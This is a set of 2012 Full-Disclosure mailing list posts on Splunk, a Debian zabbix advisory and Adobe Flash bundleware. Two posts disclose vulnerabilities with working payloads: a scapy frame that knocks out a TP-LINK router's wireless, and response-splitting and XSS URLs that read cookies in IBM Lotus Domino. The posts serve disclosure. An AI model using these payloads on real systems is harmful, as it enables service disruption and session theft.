Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure
On Tue, Aug 28, 2012 at 09:59:19PM +1000, craig deveson wrote: Issue has been resolved in version 1.47 In which revision? This looks like up-to-date repository: http://plugins.svn.wordpress.org/cloudsafe365-for-wp/ - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Splunk Vulnerability
On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote: 1.) The tool, Splunk, is designed to index logs 2.) Logs are arbitrary files. Therefore, 3.) Splunk is designed to index arbitrary files. Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TP-LINK TL-WR340G Wireless Denial of Service
=== intro === TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP. Now it's marked End-of-Life. Transmitting crafted frames in proximity of working router cause device to malfunction. Wireless communication stops, existing clients don't receive frames from AP ( except beacons ), new clients can't connect. === details === Affected product: TL-WR340G Wireless router Firm Version: 4.7.11 Build 101102 Rel.60376n Hardware Version: WR340G v3 Local/remote: Local ( wirelessly ) Vulnerability can be spotted by crafting and transmitting frame with scapy: fr = RadioTap()/Dot11(addr1=ff:ff:ff:ff:ff:ff,addr2=AP MAC,addr3=AP MAC)/Dot11Beacon()/Dot11Elt() sendp(fr,iface=injection capable wireless interface,count=5) Attacker could cease wireless traffic. To resume AP functionality user must restart wireless interface in WebGUI or restart device. === time-line === 2.08.2012 - vendor notified 4.09.2012 - no response from vendor, published ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Splunk Vulnerability
I agree. Splunk *IS* doing what it was designed to do. -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org From: JxT [mailto:jxt.li...@gmail.com] Sent: Thursday, September 06, 2012 2:19 AM To: Zach C. Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Splunk Vulnerability On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote: 1.) The tool, Splunk, is designed to index logs 2.) Logs are arbitrary files. Therefore, 3.) Splunk is designed to index arbitrary files. Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself. smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Splunk Vulnerability
well Im glad we got multiple emails saying you all agree,. On Thu, Sep 6, 2012 at 8:50 AM, Michael D. Wood m...@itsecuritypros.org wrote: I agree. Splunk *IS* doing what it was designed to do. -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org From: JxT [mailto:jxt.li...@gmail.com] Sent: Thursday, September 06, 2012 2:19 AM To: Zach C. Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Splunk Vulnerability On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote: 1.) The tool, Splunk, is designed to index logs 2.) Logs are arbitrary files. Therefore, 3.) Splunk is designed to index arbitrary files. Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2539-1] zabbix security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2539-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert September 06, 2012 http://www.debian.org/security/faq - - Package: zabbix Vulnerability : SQL injection Problem type : remote Debian-specific: no CVE ID : CVE-2012-3435 Debian Bug : 683273 It was discovered that Zabbix, a network monitoring solution, does not properly validate user input used as a part of an SQL query. This may allow unauthenticated attackers to execute arbitrary SQL commands (SQL injection) and possibly escalate privileges. For the stable distribution (squeeze), this problem has been fixed in version 1:1.8.2-1squeeze4. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 1:2.0.2+dfsg-1. We recommend that you upgrade your zabbix packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBIX7AACgkQYy49rUbZzlrfKwCdGUAYYsmuSFcaKKjgaap5PmSg Yj4AoJ6SogKTB06ZEoEwxkCAhGv7XIvO =lWI6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Splunk Vulnerability
And I'm sure glad you took the time to notice! -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org - Reply message - From: Benji m...@b3nji.com To: Michael D. Wood m...@itsecuritypros.org Cc: JxT jxt.li...@gmail.com, Zach C. fxc...@gmail.com, full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Splunk Vulnerability Date: Thu, Sep 6, 2012 4:53 am well Im glad we got multiple emails saying you all agree,. On Thu, Sep 6, 2012 at 8:50 AM, Michael D. Wood m...@itsecuritypros.org wrote: I agree. Splunk *IS* doing what it was designed to do. -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org From: JxT [mailto:jxt.li...@gmail.com] Sent: Thursday, September 06, 2012 2:19 AM To: Zach C. Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Splunk Vulnerability On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote: 1.) The tool, Splunk, is designed to index logs 2.) Logs are arbitrary files. Therefore, 3.) Splunk is designed to index arbitrary files. Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ attachment: adobe-flash-install-shit.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86? T Sent from whatever device will keep us from debating which one is better. On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ adobe-flash-install-shit.png ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Was this on Windows or Linux?m I did the update on Linux and of course just got the update. Was there an option for Manual/Automatic update? If so always chose manual and remove the extras! Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 On 09/06/2012 01:18 PM, Thor (Hammer of God) wrote: FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86? T Sent from whatever device will keep us from debating which one is better. On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ adobe-flash-install-shit.png ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Hi Thor, This is a corporate laptop, and it needs Flash periodically. An Adobe update process runs on occassion, prompting to install the update. Actually, there wasn't even an option for other bits. I did not have the option either. Jeff On Thu, Sep 6, 2012 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86? T Sent from whatever device will keep us from debating which one is better. On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ adobe-flash-install-shit.png ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
On Thu, Sep 6, 2012 at 1:26 PM, James Lay j...@slave-tothe-box.net wrote: On 2012-09-06 11:09, Jeffrey Walton wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [SNIP] Perhaps someone didn't uncheck the checkbox on download Fortunately, I still had the browser Windows open (that was opened by the update process): https://get3.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer. No check boxes - only instructions to install. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Uhh I had to update a Windows box just the other day and it didn't install any toolbars or anything like that. Might wanna start running a few scans.. On Sep 6, 2012 10:42 AM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Sep 6, 2012 at 1:26 PM, James Lay j...@slave-tothe-box.net wrote: On 2012-09-06 11:09, Jeffrey Walton wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [SNIP] Perhaps someone didn't uncheck the checkbox on download Fortunately, I still had the browser Windows open (that was opened by the update process): https://get3.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer . No check boxes - only instructions to install. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Yeah. +1 Troll. (and I don't even like Adobe!) On Thu, Sep 6, 2012 at 7:09 PM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 91, Issue 9
Over the years I've done dozens (at least) of Adobe Flash updates on behalf of my employer. I'm not currently in a position to verify by experimentation, but my experience has been that under some (relatively infrequent) circumstances that check box is suppressed, or nonexistent. In those cases, the browser tool-bar (along with any other crapware that Adobe has solicited bribes to distribute) is installed without explicit opt-in. S. Miller Subject: Full-Disclosure Digest, Vol 91, Issue 9 Message: 6 Date: Thu, 06 Sep 2012 11:26:54 -0600 From: James Lay j...@slave-tothe-box.net Subject: Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent To: full-disclosure@lists.grok.org.uk Message-ID: 0e839c3f7588f803ead063cadad95e47@localhost Content-Type: text/plain; charset=utf-8 ... Perhaps someone didn't uncheck the checkbox on download ... End of Full-Disclosure Digest, Vol 91, Issue 9 ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
It appears Adobe has become a whore to Google like Mozilla. Got hit offlist for this one. I'd better cite this one, too. https://www.google.com/#sclient=psy-abq=mozilla+google+deal https://www.google.com/#sclient=psy-abq=mozilla+google+irs Mozilla almost lost their non-profit status because they made so much money form Google. On Thu, Sep 6, 2012 at 1:09 PM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Adobe Flash UpdateInstalls Other Warez without Consent
On Thu, Sep 6, 2012 at 2:55 PM, Skyler King sk...@checkpoint.com wrote: Don't forget about your Java security updates installing McAfee Security Center. Or Java and Ask.com -Original Message- From: funsec-boun...@linuxbox.org [mailto:funsec-boun...@linuxbox.org] On Behalf Of Jeffrey Walton Sent: Thursday, September 06, 2012 11:19 AM To: FunSec List Cc: Full Disclosure; BugTraq Subject: Re: [funsec] Adobe Flash UpdateInstalls Other Warez without Consent It appears Adobe has become a whore to Google like Mozilla. Got hit offlist for this one. I'd better cite this one, too. https://www.google.com/#sclient=psy-abq=mozilla+google+deal https://www.google.com/#sclient=psy-abq=mozilla+google+irs Mozilla almost lost their non-profit status because they made so much money form Google. On Thu, Sep 6, 2012 at 1:09 PM, Jeffrey Walton noloa...@gmail.com wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com. [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_ty pe=allcves=on [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-tar get/ [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Adobe Flash UpdateInstalls Other Warez without Consent
On Thursday, September 06, 2012 02:59:33 PM Jeffrey Walton wrote: Or Java and Ask.com or nmap and download.com... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
Hello list! I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities. CVE ID: CVE-2012-3301. - Affected products: - Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on other vulnerabilities, about which I've informed them. For fixes, workarounds and mitigations reference to IBM Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21608160 -- Details: -- HTTP Response Splitting (WASC-25): http://site/servlet/%0AHeader:value%0A1 Cross-Site Scripting (WASC-08): Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9): http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1 Will work in all versions of Firefox, but without access to cookies: http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1 Also there can be used Location header for XSS attack (for which there are its own nuances of work in different browsers). Cross-Site Scripting (WASC-08): The attack is possible via data: and vbscript: URI. http://site/mail/x.nsf/MailFS?OpenFrameSetFrame=NotesViewSrc=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSetFrame=NotesViewSrc=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B In x.nsf, x means username of logged in user. Timeline: Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html). - During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site. - During 16.05-20.05 I've wrote five advisories via contact form at IBM site. - At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products). - At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from total amount of holes). - At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/). Best wishes regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/